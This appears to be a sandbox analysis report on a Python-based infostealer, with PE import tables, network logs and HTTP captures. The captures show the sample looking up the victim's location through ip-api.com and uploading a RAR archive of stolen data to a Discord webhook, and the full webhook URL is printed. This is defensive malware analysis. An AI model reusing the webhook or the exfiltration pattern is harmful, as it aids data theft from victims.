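    """False when the whole file is far more random than any section: the excess must
    come from data outside the sections, i.e. the overlay."""
    return file_entropy <= max(e for *_, e in sections) + 0.5


if __name__ == "__main__":
    code = hresult(SIGNATURE_ERROR)
    print(f"signature error 0x{code:08X}, TRUST_E_BAD_DIGEST: {code == TRUST_E_BAD_DIGEST}")
    r = overlay_report(SECTIONS, FILE_SIZE, SECURITY_DIR)
    print(f"sections end at 0x{r['data_end']:x}; overlay {r['overlay_bytes']} bytes "
          f"({r['overlay_fraction']:.1%} of file); certificate table at EOF: {r['signature_at_eof']}")
    print("file entropy explained by sections:", entropy_explained_by_sections(SECTIONS, FILE_ENTROPY))
    print("entropy of zeros:", shannon_entropy(b"\x00" * 4096),
          "uniform bytes:", shannon_entropy(bytes(range(256)) * 16))
```

Run it as a script to see the three verdicts; on a real sample you would replace the transcribed constants with values read from the section headers, and the two assumptions disappear because the raw offsets are then known.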
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x470a0 | 0x394 | OpenPGP Secret Key (libmagic misidentification of the VS_VERSIONINFO block) | | | 0.45087336244541487
RT_MANIFEST | 0x47434 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll | (no named imports listed)
KERNEL32.dll | IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 01:36:49.175780058 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
May 23, 2024 01:36:49.181057930 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.9
May 23, 2024 01:36:49.181145906 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
May 23, 2024 01:36:49.181269884 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
May 23, 2024 01:36:49.232743025 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.9
May 23, 2024 01:36:49.702807903 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.9
May 23, 2024 01:36:49.754935980 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
May 23, 2024 01:36:49.902086973 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:49.902138948 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:49.902286053 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:49.928217888 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:49.928237915 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.402914047 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.403409958 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.403436899 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.404323101 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.404385090 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405066967 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405124903 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.405412912 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405419111 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.405644894 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405673027 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.405750036 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405776978 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.405874968 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.405889034 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406244993 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406256914 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406276941 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406284094 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406321049 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406328917 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406404018 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406409979 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406428099 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406439066 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406440973 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406447887 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406452894 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406457901 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406521082 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406527996 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.406547070 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406555891 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406570911 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406624079 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406651974 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406657934 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406675100 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406722069 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406728983 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406750917 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406785011 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.406816006 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.425864935 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426000118 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426011086 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426065922 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426075935 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426094055 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426114082 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426125050 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426134109 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426141977 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426168919 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426189899 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426203966 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426212072 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426222086 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426255941 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426259041 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426285982 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426296949 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426314116 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426322937 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426341057 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426353931 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426362038 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426405907 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426409960 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426431894 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426450014 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426465034 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426481962 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426490068 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426512957 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426525116 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426542997 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426553011 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426562071 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.426582098 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426624060 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426632881 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:50.426676989 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:50.435913086 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:51.151699066 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:51.151858091 CEST | 443 | 49715 | 162.159.135.232 | 192.168.2.9
May 23, 2024 01:36:51.151932955 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:51.152772903 CEST | 49715 | 443 | 192.168.2.9 | 162.159.135.232
May 23, 2024 01:36:51.167581081 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
May 23, 2024 01:36:51.205621958 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.9
May 23, 2024 01:36:51.205692053 CEST | 49714 | 80 | 192.168.2.9 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 01:36:49.166210890 CEST | 53084 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 01:36:49.174890995 CEST | 53 | 53084 | 1.1.1.1 | 192.168.2.9
May 23, 2024 01:36:49.894299030 CEST | 64318 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 01:36:49.901182890 CEST | 53 | 64318 | 1.1.1.1 | 192.168.2.9
May 23, 2024 01:36:54.921638012 CEST | 53 | 53187 | 162.159.36.2 | 192.168.2.9
May 23, 2024 01:36:56.108144045 CEST | 53 | 63792 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 01:36:49.166210890 CEST | 192.168.2.9 | 1.1.1.1 | 0x3c0a | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.894299030 CEST | 192.168.2.9 | 1.1.1.1 | 0xcb63 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 01:36:49.174890995 CEST | 1.1.1.1 | 192.168.2.9 | 0x3c0a | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.901182890 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb63 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.901182890 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb63 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.901182890 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb63 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.901182890 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb63 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
May 23, 2024 01:36:49.901182890 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb63 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                                          • discord.com
                                                          • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49714 | 208.95.112.1 | 80 | 7656 | C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 01:36:49.181269884 CEST | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
                                                          Host: ip-api.com
                                                          Accept-Encoding: identity
                                                          User-Agent: python-urllib3/2.2.1
May 23, 2024 01:36:49.702807903 CEST | 381 | IN | HTTP/1.1 200 OK
                                                          Date: Wed, 22 May 2024 23:36:49 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Content-Length: 204
                                                          Access-Control-Allow-Origin: *
                                                          X-Ttl: 60
                                                          X-Rl: 44
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 7d
                                                          Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-175.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.175"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49715 | 162.159.135.232 | 443 | 7656 | C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-22 23:36:50 UTC | 302 | OUT | POST /api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC HTTP/1.1
                                                          Host: discord.com
                                                          Accept-Encoding: identity
                                                          Content-Length: 757061
                                                          User-Agent: python-urllib3/2.2.1
                                                          Content-Type: multipart/form-data; boundary=7aed04c08861a53965fd837c5996aad0
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 2d 2d 37 61 65 64 30 34 63 30 38 38 36 31 61 35 33 39 36 35 66 64 38 33 37 63 35 39 39 36 61 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 74 69 6e 61 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 62 68 53 bd 21 04 00 00 01 0f be 58 82 47 28 22 c7 12 1f 8d 0b 77 25 41 8e 5f 08 9e de ca e2 e7 31 13 50 10 ef e4 cf 92 f4 18 09 cd e4 f6 e3 8d 5f b1 02 e7 53 a8 68 d5 fd 76 ad 04 f1 cc 9a ba 7b e2 3d 02 23 73 f3 25 04 8e c0 1d c4 32 91 b1 59 4a a4 05 e1 19 c0 95 0c f1 5b 7b 5b 08 be fd 20
                                                          Data Ascii: --7aed04c08861a53965fd837c5996aad0Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!bhS!XG("w%A_1P_Shv{=#s%2YJ[{[
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 0f 9e 88 72 4e 8f bb a0 5d 01 5f f6 61 9c 01 76 4b a1 0b 1f 9a 7d d9 0f 17 54 0c 4d 69 be 88 18 4a 06 9e 3a bc 51 c8 4a 09 8e f5 f4 ff 8d ee e9 bc a0 d5 7f 86 32 52 3e 78 72 4d b8 b8 a7 4e 1b 95 69 2d e3 92 fe 42 2e 0b a1 00 fa ff 76 d3 58 32 41 f2 df ae cf 7a 39 e2 9a c6 f6 fa 44 35 7c 29 2f 62 54 34 63 d1 35 53 37 4f 60 f2 dd 16 05 72 7f a7 4a 47 89 7f 03 08 fc 4d 83 7b f2 22 2d 68 ff 96 3d 44 94 e8 ae 6b 92 25 3c c7 ae 40 b7 46 98 f0 b6 2f 0f a8 5a 98 9c 85 9d 9c 7e 82 9d 9b 49 20 d9 ee ee ce 83 69 c6 42 bc f4 8e c5 4a b1 bc 54 a0 a0 15 aa 52 fb 5e af 04 4d 2c dc 55 f4 85 4a 0b f3 f4 64 f3 35 78 47 1d 56 35 9d fa 25 57 20 a6 c8 f0 86 ab 83 03 be 76 45 b8 11 86 cd 9e ae 49 b0 00 08 31 fa 3f 53 93 bf 67 f9 8d 5f 76 41 96 c0 d5 70 86 54 21 3a 49 0f c4 e0
                                                          Data Ascii: rN]_avK}TMiJ:QJ2R>xrMNi-B.vX2Az9D5|)/bT4c5S7O`rJGM{"-h=Dk%<@F/Z~I iBJTR^M,UJd5xGV5%W vEI1?Sg_vApT!:I
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 8f c8 db bc ee fa f2 64 78 7e ab 42 88 87 79 95 2e a7 73 96 0f 40 19 1c 99 2e 81 ef 04 f7 1e ee e9 3d b5 94 4d ac 1c 86 33 d4 0a df 10 43 4a db b1 db e2 af f3 72 0d bc 18 d0 78 93 e7 63 83 7a ea 97 bd 61 02 80 97 a5 12 c6 68 2f 7c 8c e7 0c 7f 29 86 25 09 40 fe 99 f7 49 f0 2c 08 fd b5 98 18 b2 d1 b0 e3 8e 3d b9 50 32 68 ce c2 d0 36 6a 8a 53 e5 95 4a 26 ba e4 1f 37 f2 c4 48 b4 74 2c 04 b4 4a 29 a4 00 9c 45 7a 0d 94 20 37 29 d5 1e cd d3 12 9f 84 ca 69 40 e9 a6 52 a0 85 7b de 84 24 f0 08 8c 29 dd ec a4 b4 ba 57 e4 93 12 f8 61 99 04 de 7f 03 93 51 dd 97 11 ff 20 3d 68 de d8 5c ca b9 58 8c ec 75 c4 ec df d5 cc 51 a8 fc d6 d4 bf 1f 84 bc 9b 1a 4e 02 ef 4c b8 b4 25 3b 69 4b 9d 56 d3 6d e7 e2 69 3c 18 46 5d 53 8e d3 77 db 6a 7d 1f 91 e3 20 06 ec e8 b9 94 1b c7 58
                                                          Data Ascii: dx~By.s@.=M3CJrxczah/|)%@I,=P2h6jSJ&7Ht,J)Ez 7)i@R{$)WaQ =h\XuQNL%;iKVmi<F]Swj} X
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 67 83 f7 18 4b 02 26 0c 92 74 00 a8 b2 61 b3 81 6d f9 7f ce 2d 5a f4 d7 0a db 3c b4 0b 97 2d ac 98 fd 51 02 d6 4e 07 05 99 3b ab 30 12 62 85 a6 d2 78 bd 7e 1c 2d 4b 5a 5d ee c5 d2 a0 f3 ed 6a 6a a9 a9 96 47 1b 89 8b 19 45 e1 65 b2 4a 43 3e 0d 9c 77 a5 f3 7a 06 02 b9 2a c2 2c ce 0a c8 ca bf a7 3a c8 43 bb d0 ee 1d 6a 66 b5 59 dc 9e d1 90 1f f9 33 3f 5a 4b b0 e8 fb d6 8c 5e 80 24 1a 75 19 60 b4 b7 35 fe 2b 97 37 fb e3 03 17 0e 69 92 5a b3 d4 59 9e cf ae b3 1b 6c d8 7e 11 93 13 2e 6e 78 92 e7 2d 31 30 df 6e ea 5b f4 59 04 fb 1c 8b 16 ce 59 89 51 1f aa 20 79 45 5f 7a b1 74 d0 4f ef d0 97 2a bd 78 59 60 7f 5f ab 9a 6b 91 9c 79 31 ae 36 45 70 53 9f 2b db 01 e3 d7 f8 72 fe f7 b6 37 f6 c3 37 f3 ee 6d c5 4a 39 fe 5b 80 1a c6 0b 56 c8 bb 8c 0b c4 f5 5a 17 76 4d b6
                                                          Data Ascii: gK&tam-Z<-QN;0bx~-KZ]jjGEeJC>wz*,:CjfY3?ZK^$u`5+7iZYl~.nx-10n[YYQ yE_ztO*xY`_ky16EpS+r77mJ9[VZvM
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 52 f9 58 d0 5c 37 1c 53 8f 67 07 91 e3 f0 95 9e a9 9d 27 80 b6 63 50 f6 fa 21 af b1 1d 90 1d 5c 6c 9b 77 3b f4 81 a3 f4 18 07 2b 9a f3 55 26 81 7b 51 60 ff 33 b2 0b 4f bf 0e 79 60 bd 8b 77 89 c8 e1 e0 f4 35 a2 83 a6 a5 94 0f 45 f2 ea 85 5e 39 7d f1 cc 4b a2 df e5 21 c5 59 5c 58 dc 55 4f f2 17 55 f0 3e d6 47 7c 6c 7f f4 e3 5a f1 d6 44 93 b7 5d d4 ad 67 c9 6d f7 14 b9 5e 97 79 70 bf 3f f9 3c b5 78 6f 34 e8 0a 6f 9e 80 c2 2f 6c 19 d3 fb a1 62 d3 63 e7 ae 01 78 a6 45 20 1d 70 91 0e 3d e7 4f ae 93 53 e0 74 8d e0 73 6a 3c 4f e9 7f d6 b8 fc fa 30 00 2d b7 bc 79 e9 83 15 8b 29 32 d7 55 00 ca e0 f2 2f 03 8a 47 3a 89 4d 92 ec ee 00 35 16 36 6b 7b ed ed 49 6d ef 87 ba ed 88 64 75 3c c9 4a cf 68 74 c3 db 37 07 4a d0 4c da ee c7 f9 88 3c ea a3 ec ce 82 f4 d6 5d 8c 75
                                                          Data Ascii: RX\7Sg'cP!\lw;+U&{Q`3Oy`w5E^9}K!Y\XUOU>G|lZD]gm^yp?<xo4o/lbcxE p=OStsj<O0-y)2U/G:M56k{Imdu<Jht7JL<]u
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: c7 10 1b 8d 87 62 81 18 7c 48 8d 53 a8 d8 fc a4 80 51 63 0a 66 7d ab 27 cd d4 5b 09 40 4f ea 02 63 33 96 ea b4 a2 57 ed 82 94 31 d3 8b 04 c3 60 e6 54 94 dd b3 7e 0f a0 05 d3 76 55 a8 cb 6c a6 85 d5 de ad 31 b7 1e ec a7 0f 36 81 62 bf 53 5b 85 95 44 df db 8d 8e 98 52 93 8a 5e c8 54 c0 6c fc 0a 1b cd 7c 9f 1c 56 4f 11 ac 99 d1 3f 19 3a e5 bd 81 29 d0 f0 1e 00 0e aa 79 d5 e2 ee a6 0c 8a 9a 5c 71 f8 f7 09 17 31 fe 72 e8 5b 69 03 56 1d 25 b9 0c 98 7d 27 00 01 14 41 6a bc eb b1 e1 05 91 ec 81 b7 3c 67 4f a3 11 a3 39 9e 17 54 9d 9f ad 15 90 10 90 45 20 c8 5d 61 dc 6a 2b 6d 6e 2e 8e ef 01 9c 58 b6 0d 09 15 ed 6c 5a 36 47 b7 6a 93 eb b7 59 06 26 e0 1d 75 18 89 ab d0 fb b1 2f 33 51 1a cd d6 52 a3 24 7f 10 ae d8 3d ee 9b 71 ea 7e 07 85 af ba d1 56 47 c4 11 43 c5 a5
                                                          Data Ascii: b|HSQcf}'[@Oc3W1`T~vUl16bS[DR^Tl|VO?:)y\q1r[iV%}'Aj<gO9TE ]aj+mn.XlZ6GjY&u/3QR$=q~VGC
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: 66 eb 36 8d 36 d6 a7 c2 33 96 46 ab 57 00 7d 39 4c 2d 05 53 ec f6 c6 0a a2 ab 0e 26 12 59 17 42 3e cb 6c d2 d7 44 44 04 c9 09 dc d6 b8 5f c0 a5 51 08 42 54 21 c3 54 d4 86 6a 9f b9 f3 34 ed fe 39 4b d7 fd 42 2d fc cc 4c 40 02 72 c3 24 e1 91 d1 56 6a a7 12 84 cf 94 50 c9 71 4f 8b bc a2 f4 c9 ed 33 f8 8c 2f 9c 5d 40 2d 1b bb d2 83 59 f3 59 08 4a 66 8c b8 98 aa 58 f9 f8 0f 51 2a 59 da c4 e1 bd a7 eb 2a 9b b3 cb 4b c4 7c be 01 f1 e8 a6 e1 dc 71 52 4b 01 82 71 e0 8e 9c 6f c4 0f 67 82 3d 07 3f 74 90 08 16 b5 e7 f1 61 11 96 24 f7 5e 09 9d a2 c1 c3 97 f6 9f f6 e0 dc fc ff d7 10 37 f6 4a 49 2e 5a d4 49 16 69 cc 19 e9 28 10 63 f3 c2 20 13 50 6e 4c 36 40 8f 02 40 85 8d a1 fa 9f 1d 26 73 d4 53 22 17 2d 6a be a0 6d 41 46 b2 14 59 b9 bc 0a ee 8a e4 95 76 23 a4 0d 54 52
                                                          Data Ascii: f663FW}9L-S&YB>lDD_QBT!Tj49KB-L@r$VjPqO3/]@-YYJfXQ*Y*K|qRKqog=?ta$^7JI.ZIi(c PnL6@@&sS"-jmAFYv#TR
